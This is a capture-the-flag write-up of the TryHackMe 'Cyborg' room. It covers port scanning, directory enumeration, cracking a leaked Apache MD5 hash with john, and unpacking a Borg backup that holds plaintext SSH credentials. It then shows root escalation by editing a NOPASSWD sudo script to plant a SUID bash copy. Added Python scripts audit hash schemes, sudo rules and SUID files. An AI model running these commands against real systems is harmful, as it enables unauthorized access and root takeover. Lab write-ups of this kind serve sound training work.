TryHackMe-Room: Cyborg

Mondenovice
Feb 9, 2024


Cyborg

🔰Information on this box: A box involving encrypted archives, source code analysis and more.

🔰Step 1: Scanning

After my nmap scan, I have these results:

nmap -Pn -A 10.10.176.158 -vvv
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtLmojJ45opVBHg89gyhjnTTwgEf8lVKKbUfVwmfqYP9gU3fWZD05rB/4p/qSoPbsGWvDUlSTUYMDcxNqaADH/nk58URDIiFMEM6dTiMa0gr
cKC5u4NRxOCtZGHTrZfiYLQKQkBsbmjbb5qpcuhYo/tzhVXsrr592Uph4iiUx8zhgfYhqgtehMG+UhzQRjnOBQ6GZmI4NyLQtHq7jSeu7ykqS9KEdkgwbBlGnDrC7ke1I9352lBb7jlsL/amXt2u
iRrBgsmz2AuF+ylGha97t6JkueMYHih4Pgn4X0WnwrcUOrY7q9bxB1jQx6laHrExPbz+7/Na9huvDkLFkr5Soh
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB5OB3VYSlOPJbOwXHV/je/alwaaJ8qljr3iLnKKGkwC4+PtH7IhMCAC3vim719GDimVEEGdQP
bxUF6eH2QZb20=
| 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlr5id6IfMeWb2ZC+LelPmOMm9S8ugHG2TtZ5HpFuZQ
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have two open ports: 22 (SSH) and 80 (HTTP)!

The SSH version does not look vulnerable, at least for the moment!

🔰Step 2: Enumeration

Now navigate to HTTP port:

The default Apache configuration page

Nothing interesting here! All we learn is that it's an Ubuntu machine. OK! I also looked at the page source (Ctrl+U), but found nothing! So I ran a Gobuster scan against the box and found:

Two interesting directories: /admin and /etc

Here is the content of each:

In the /admin directory I found:

We notice a file named archive.tar!

I downloaded it!

and a very interesting paragraph: "Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier. I decided to give up like i always do ahahaha sorry about that. I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process. Might pass it over to the IT guys but in the meantime all the config files are laying about. And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol. ther than that im pretty sure my backup "music_archive" is safe just to confirm."

It mentions a certain "music_archive"!

In the /etc directory I found:

squid.conf
Password

We have a password hash:

music_archive:$apr1$BpZ.Q.1m$REDACTEDOVQTTn.

Let's save it in a file "crackme.txt" and use john to crack it, with the command:

┌──(root㉿BOTNET)-[~/THM/Cyborg]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt crackme.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward (music_archive)
1g 0:00:00:02 DONE (2024-02-09 20:54) 0.4739g/s 18472p/s 18472c/s 18472C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

OK! We have the password for "music_archive"!
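The hash above starts with $apr1$, Apache's MD5-based htpasswd scheme, which is why john finished in two seconds. The script below is an added example (not from the original write-up): it classifies every entry of an htpasswd file by hash scheme and checks whether the file sits under a web root where it can simply be downloaded, the two conditions that made this credential recoverable. SAMPLE_HTPASSWD and the web-root list are constructed for the example; the salt BpZ.Q.1m is the one from the write-up, the hash body is a placeholder.

```python
"""Audit an htpasswd file for weak hash schemes and for living under the web root.

Added example, not code from the original write-up. SAMPLE_HTPASSWD is a
constructed file (the box's real hash is redacted); /var/www is an assumed
DocumentRoot.
"""
from __future__ import annotations

import os
import re
from dataclasses import dataclass
from typing import List, Tuple

# Recognised htpasswd schemes, checked in order. Only bcrypt has a tunable cost factor.
SCHEMES: List[Tuple[re.Pattern, str, str]] = [
    (re.compile(r"^\$2[aby]\$\d\d\$"), "bcrypt", "ok"),
    (re.compile(r"^\$apr1\$"), "apr1 (Apache MD5)", "weak: fast MD5-based hash, cheap to brute-force offline"),
    (re.compile(r"^\$1\$"), "md5crypt", "weak: fast MD5-based hash, cheap to brute-force offline"),
    (re.compile(r"^\{SHA\}"), "SHA-1 (unsalted)", "weak: unsalted, precomputation attacks apply"),
]

# Constructed sample, not the box's real file.
SAMPLE_HTPASSWD = """# constructed sample
music_archive:$apr1$BpZ.Q.1m$AAAAAAAAAAAAAAAAAAAAAA
ops:$2y$10$BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
legacy:{SHA}CCCCCCCCCCCCCCCCCCCCCCCCCCC=
"""


@dataclass
class Finding:
    user: str
    scheme: str
    verdict: str

    @property
    def weak(self) -> bool:
        return self.verdict != "ok"


def classify_hash(hashed: str) -> Tuple[str, str]:
    """Return (scheme label, verdict) for one htpasswd hash field."""
    for pattern, label, verdict in SCHEMES:
        if pattern.match(hashed):
            return label, verdict
    if len(hashed) == 13 and "$" not in hashed:
        return "crypt(3) DES", "weak: 8-character password limit, trivially brute-forced"
    return "plaintext or unknown", "weak: not a recognised password hash"


def audit_htpasswd(content: str) -> List[Finding]:
    """Classify every user:hash line; comments and blank lines are skipped."""
    findings = []
    for lineno, raw in enumerate(content.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            findings.append(Finding(f"line {lineno}", "malformed", "weak: no user:hash separator"))
            continue
        user, hashed = line.split(":", 1)
        findings.append(Finding(user, *classify_hash(hashed)))
    return findings


def weak_users(content: str) -> List[str]:
    """Names of all users whose stored hash is not an acceptable scheme."""
    return [f.user for f in audit_htpasswd(content) if f.weak]


def is_under_webroot(path: str, webroots: Tuple[str, ...] = ("/var/www",)) -> bool:
    """True if the credential file sits inside a DocumentRoot and can be fetched over HTTP.
    The default web-root list is an assumption; pass the real DocumentRoot(s) in use."""
    real = os.path.normpath(path)
    return any(real == w or real.startswith(w.rstrip("/") + "/") for w in webroots)


if __name__ == "__main__":
    for f in audit_htpasswd(SAMPLE_HTPASSWD):
        print(f"{f.user:15} {f.scheme:20} {f.verdict}")
    for p in ("/var/www/html/etc/squid/passwd", "/etc/squid/passwd"):
        print(p, "-> served by Apache" if is_under_webroot(p) else "-> outside web root")
```

The fix on the defending side is the same in both directions: regenerate entries with `htpasswd -B` (bcrypt) and keep the file outside the DocumentRoot, so that neither an offline guess nor a directory listing can reach it.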

Let's go back to the tar archive "archive.tar" that I downloaded! I extracted it with the command:

tar -xvf archive.tar

It contains: home/field/dev/final_archive/

We have a username: field

and we notice final_archive!

Inside I noticed a README file and opened it!

Borg is There

It's talking about Borg backups! If I remember correctly, he also talked about a backup in the "music_archive" folder.

Let’s do a little research on Borg!

What is Borg?

BorgBackup (short: Borg) is a deduplicating backup program. Optionally, it supports compression and authenticated encryption.

The main goal of Borg is to provide an efficient and secure way to backup data. The data deduplication technique used makes Borg suitable for daily backups since only changes are stored. The authenticated encryption technique makes it suitable for backups to not fully trusted targets.

First, let's install Borg with:

apt install borgbackup

Next, the README points to the borgbackup documentation! I went there and found:

# Extract entire archive
$ borg extract /path/to/repo::my-files

# Extract entire archive and list files while processing
$ borg extract --list /path/to/repo::my-files

# Verify whether an archive could be successfully extracted, but do not write files to disk
$ borg extract --dry-run /path/to/repo::my-files

# Extract the "src" directory
$ borg extract /path/to/repo::my-files home/USERNAME/src

# Extract the "src" directory but exclude object files
$ borg extract /path/to/repo::my-files home/USERNAME/src --exclude '*.o'

# Restore a raw device (must not be active/in use/mounted at that time)
$ borg extract --stdout /path/to/repo::my-sdx | dd of=/dev/sdx bs=10M

on the official documentation:

I used this (the generic form from the documentation, then the actual command):

borg extract /path/to/repo::my-files
borg extract home/field/dev/final_archive/::music_archive

Be sure to be in the directory containing the extracted home directory!
Then I'm prompted for the password and that's it!

I went back to the home folder and used the "tree" command:

┌──(root㉿BOTNET)-[~/THM/Cyborg/home]
└─# tree
.
|-- alex
|   |-- Desktop
|   |   `-- secret.txt
|   |-- Documents
|   |   `-- note.txt
|   |-- Downloads
|   |-- Music
|   |-- Pictures
|   |-- Public
|   |-- Templates
|   `-- Videos
`-- field
    `-- dev
        `-- final_archive
            |-- README
            |-- config
            |-- data
            |   `-- 0
            |       |-- 1
            |       |-- 3
            |       |-- 4
            |       `-- 5
            |-- hints.5
            |-- index.5
            |-- integrity.5
            `-- nonce

15 directories, 12 files

Yes, I know, the suspicious files are secret.txt and note.txt!

Let's look at them. The only interesting one is note.txt in home/alex/Documents, which holds credentials:

┌──(root㉿BOTNET)-[~/…/Cyborg/home/alex/Documents]
└─# cat note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:REDACTED

We have Alex's credentials! So the first thing that comes to mind is an SSH connection.

┌──(root㉿BOTNET)-[~/…/Cyborg/home/alex/Documents]
└─# ssh alex@10.10.176.158
The authenticity of host '10.10.176.158 (10.10.176.158)' can't be established.
ED25519 key fingerprint is SHA256:hJwt8CvQHRU+h3WUZda+Xuvsp1/od2FFuBvZJJvdSHs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.176.158' (ED25519) to the list of known hosts.
alex@10.10.176.158's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


27 packages can be updated.
0 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$

😀😀😀 I'm logged in as Alex and can read user.txt:

cat user.txt

🔰Step 3: Privilege Escalation

Now for the privesc. Here is what we get with:

sudo -l

You can run this script as anyone without a password! Isn’t that great 😀!

Now let's look at our permissions on the file:

We see that user alex owns the file, so we can modify the script as we like. Instead of a reverse shell, we're going to do something else today 😎. I will add this code to the script: since the script is executed as root, root will run the code and copy /bin/bash with the SUID bit set. The SUID bit lets a file run with the privileges of its owner rather than those of the user launching it.

cp /bin/bash ./ && chmod +s bash

Then we change the permissions on the script so it is executable:

chmod 700 /etc/mp3backups/backup.sh

and run the script with sudo:

sudo /etc/mp3backups/backup.sh

Nothing visible happens:

But just run:

ls -la

We notice a bash binary owned by root with the SUID bit set 😀!
So if I run the command:

./bash -p

I'm still alex, but with the euid and egid of root:
So I can run any command as root, but for a nicer shell (a step many people skip afterwards), if Python is installed on the machine you can do:

bash-4.3# python
Python 2.7.12 (default, Oct 5 2020, 13:56:01)
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.setgid(0)
>>> os.system("/bin/bash -p")
root@ubuntu:~#

This is prettier as well!

Finally, we can read the "root.txt" file:

cat root.txt
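Two local checks would have caught this whole escalation path: a sudo rule letting alex run, without a password, a script that alex also owns, and the root-owned SUID copy of bash it left behind in alex's directory. The script below is an added example (not part of the original write-up) that parses `sudo -l` style rules and flags targets a non-root user could rewrite, then reports SUID files missing from an allow-list. The `sudo -l` text and every piece of file metadata in it are constructed so it runs offline; scan_tree() feeds the same SUID check from a real filesystem.

```python
"""Two local checks that would have caught this escalation path.

Added example, not part of the original write-up. SAMPLE_SUDO_L,
SAMPLE_FILE_INFO and SAMPLE_SUID_ENTRIES are constructed; only the script
path /etc/mp3backups/backup.sh comes from the write-up.
"""
import os
import re
import stat
from typing import Dict, Iterable, List, Tuple

# Constructed: (owner uid, mode) for the files named in the sudo rules.
SAMPLE_FILE_INFO: Dict[str, Tuple[int, int]] = {
    "/etc/mp3backups/backup.sh": (1000, 0o644),  # owned by uid 1000 (alex), as on the box
    "/opt/deploy/run.sh": (0, 0o777),            # root-owned but world-writable
    "/usr/bin/apt-get": (0, 0o755),              # root-owned, not writable by others
}

# Constructed, in the shape `sudo -l` prints for the invoking user.
SAMPLE_SUDO_L = """User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
    (root) NOPASSWD: /opt/deploy/run.sh
    (root) /usr/bin/apt-get
"""

# Constructed: (path, owner uid, st_mode) as os.lstat would report them.
SAMPLE_SUID_ENTRIES = [
    ("/usr/bin/sudo", 0, stat.S_IFREG | 0o4755),
    ("/usr/bin/passwd", 0, stat.S_IFREG | 0o4755),
    ("/home/alex/bash", 0, stat.S_IFREG | 0o6755),     # root-owned SUID copy of bash: the backdoor
    ("/home/alex/notes.txt", 1000, stat.S_IFREG | 0o644),
]
BASELINE_SUID = ["/usr/bin/sudo", "/usr/bin/passwd"]  # what the image is expected to ship with

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+)")


def parse_sudo_l(text: str) -> List[Tuple[str, bool, str]]:
    """Return (runas spec, has NOPASSWD, command path) for each rule line."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m["runas"].strip(), "NOPASSWD" in m["tags"], m["cmd"]))
    return rules


def check_sudo_targets(text: str, file_info: Dict[str, Tuple[int, int]]) -> List[str]:
    """Flag sudo targets that are not root-owned or are group/world writable:
    whoever can edit such a file runs arbitrary code as the runas user."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        if cmd not in file_info:
            findings.append(f"{cmd}: target not found")
            continue
        uid, mode = file_info[cmd]
        reasons = []
        if uid != 0:
            reasons.append(f"owned by uid {uid}")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("group/world writable")
        if reasons:
            tag = "NOPASSWD " if nopasswd else ""
            findings.append(f"{cmd}: {tag}runs as ({runas}) but is {', '.join(reasons)}")
    return findings


def find_unexpected_suid(entries: Iterable[Tuple[str, int, int]],
                         allowlist: Iterable[str]) -> List[str]:
    """Report regular files with the SUID bit that are not on the allow-list,
    root-owned ones first since those grant root directly."""
    allowed = set(allowlist)
    hits = [(p, u) for p, u, m in entries
            if stat.S_ISREG(m) and m & stat.S_ISUID and p not in allowed]
    hits.sort(key=lambda t: (t[1] != 0, t[0]))
    return [f"{p} (owner uid {u})" for p, u in hits]


def scan_tree(root: str) -> Iterable[Tuple[str, int, int]]:
    """Yield (path, uid, st_mode) for every file under root without following symlinks."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_uid, st.st_mode


if __name__ == "__main__":
    for f in check_sudo_targets(SAMPLE_SUDO_L, SAMPLE_FILE_INFO):
        print("sudo:", f)
    for f in find_unexpected_suid(SAMPLE_SUID_ENTRIES, BASELINE_SUID):
        print("suid:", f)
    # On a live host: find_unexpected_suid(scan_tree("/"), BASELINE_SUID)
```

The sudo check is the one that matters most here: a NOPASSWD rule is only as safe as the write permissions on its target, so the target must be root-owned and not writable by group or others. The SUID scan, run against a baseline taken when the host was built, is how the leftover ./bash would show up on the next audit.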

🔰🔰🔰Thank you for READING 😀😀😀😀😀😀
